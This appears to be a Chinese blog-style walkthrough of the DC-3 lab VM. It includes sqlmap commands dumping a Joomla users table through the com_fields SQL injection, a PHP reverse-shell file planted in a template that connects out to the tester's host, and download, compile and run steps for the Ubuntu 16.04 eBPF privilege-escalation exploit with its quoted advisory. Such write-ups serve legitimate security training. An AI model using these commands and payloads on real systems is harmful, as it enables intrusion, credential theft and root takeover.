DC-3靶機滲透

修改錯誤配置

打開了ova文件會發現，怎麼也找不到DC-3的ip地址，估計是網卡出了問題。
那麼就先配置下網卡。

進入上面這個頁面以前按e。

將這裏的ro 替換爲 rw signie init=/bin/bash

按下Ctrl鍵+X鍵進入命令行

查看當前網卡IP信息 ip a，網卡名ens33

編輯網卡配置文件vim /etc/network/interfaces(原先的網卡名不一致)

重啓網卡服務/etc/init.d/networking restart，在看看ip a

能夠看到已經有ip了。

信息蒐集

nmap -sP 192.168.146.0/24 #主機發現
nmap -A 192.168.146.0/24 #掃描

掃描看下是什麼cms
python3 cmseek.py -u 192.168.146.145 #github上有

這裏寫沒有檢測到核心漏洞，那咱們google一下看看有沒有別的漏洞。
https://www.exploit-db.com/exploits/42033
本身測一下這個網站發現確實有sql注入。

http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1
http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1%27

詳細連接:https://www.anquanke.com/post/id/86119

getFlag

發現了sql注入漏洞，直接上sqlmap把
sqlmap -u "http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] #爆表庫

sqlmap -u "http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb --tables #爆表

sqlmap -u "http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' --columns #爆列

sqlmap -u "http://192.168.146.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' -C id,name,password,username --dump #爆字段

管理員加密後的密碼：$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu。
那下面思路就是看看能不能破解這個密碼了。
這裏有兩個選擇kali的john或者johnny，前者是命令行後者是可視化界面。兩個都用用吧。

拿到admin帳號密碼就登錄進去看看。

發現沒什麼東西，應該是要從後臺進入。咱們剛剛已經掃描出了後臺目錄。http://192.168.146.145/administrator/

看到Extensions-Templates處有不少php文件

直接新建一個php文件，找到文件的目錄測試一下。

找到目錄http://192.168.146.145/templates/protostar/A1oe.php

成功執行代碼。那麼接下來直接反彈shell。

<?php
$sock=fsockopen('192.168.146.132',4444);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('sh',$descriptorspec,$pipes);
proc_close($process);
echo phpinfo();
?>

再使用nc -lvvp 4444來監聽，而後訪問http://192.168.146.145/templates/protostar/A1oe.php獲得shell

看一眼linux的版本/etc/*-release

ubuntu 16.04是有內核漏洞能夠直接提權的，searchspolit找一下看看能不能直接用。

在看看kernel的版本 uname -a

選擇一個對應的試試，我這裏選擇的是39772.txt

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:

	/* look for pseudo eBPF instructions that access map FDs and
	 * replace them with actual map pointers
	 */
	static int replace_map_fd_with_map_ptr(struct verifier_env *env)
	{
		struct bpf_insn *insn = env->prog->insnsi;
		int insn_cnt = env->prog->len;
		int i, j;

		for (i = 0; i < insn_cnt; i++, insn++) {
			[checks for bad instructions]

			if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
				struct bpf_map *map;
				struct fd f;

				[checks for bad instructions]

				f = fdget(insn->imm);
				map = __bpf_map_get(f);
				if (IS_ERR(map)) {
					verbose("fd %d is not pointing to valid bpf_map\n",
						insn->imm);
					fdput(f);
					return PTR_ERR(map);
				}

				[...]
			}
		}
		[...]
	}


__bpf_map_get contains the following code:

/* if error is returned, fd is released.
 * On success caller should complete fd access with matching fdput()
 */
struct bpf_map *__bpf_map_get(struct fd f)
{
	if (!f.file)
		return ERR_PTR(-EBADF);
	if (f.file->f_op != &bpf_map_fops) {
		fdput(f);
		return ERR_PTR(-EINVAL);
	}

	return f.file->private_data;
}

The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.


One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.

There are two problems with this approach:

The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)

writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7


Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

以下方式使用

root@kali:~/tmp# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip  #下載zip

root@kali:~/tmp# unzip *		#解壓zip

root@kali:~/tmp# cd 39772/		#訪問目錄

而後上傳解壓，又或者靶機直接wget下載（傳到滲透機的web目錄下）。

tar xvf exploit.tar  #解壓
bash compile.sh
ls
./doubleput

總結

此次靶機比較坑...下載ova文件打開根本找不到靶機的ip地址，而後下載了vm專用的，然而我是vm workstation也用不了...我的又不想去下載其餘的軟件，因此就晾了一段時間。 後面上網查詢資料，加上本身的摸索發現應該是網卡的配置出了問題致使的沒法獲取ip地址，由此來逐步解決。 學習的內容的話，學到了兩個爆破密碼的工具john+johnny。而後是好像玩DC系列以來，第一次使用內核漏洞提權。（刺激.jpg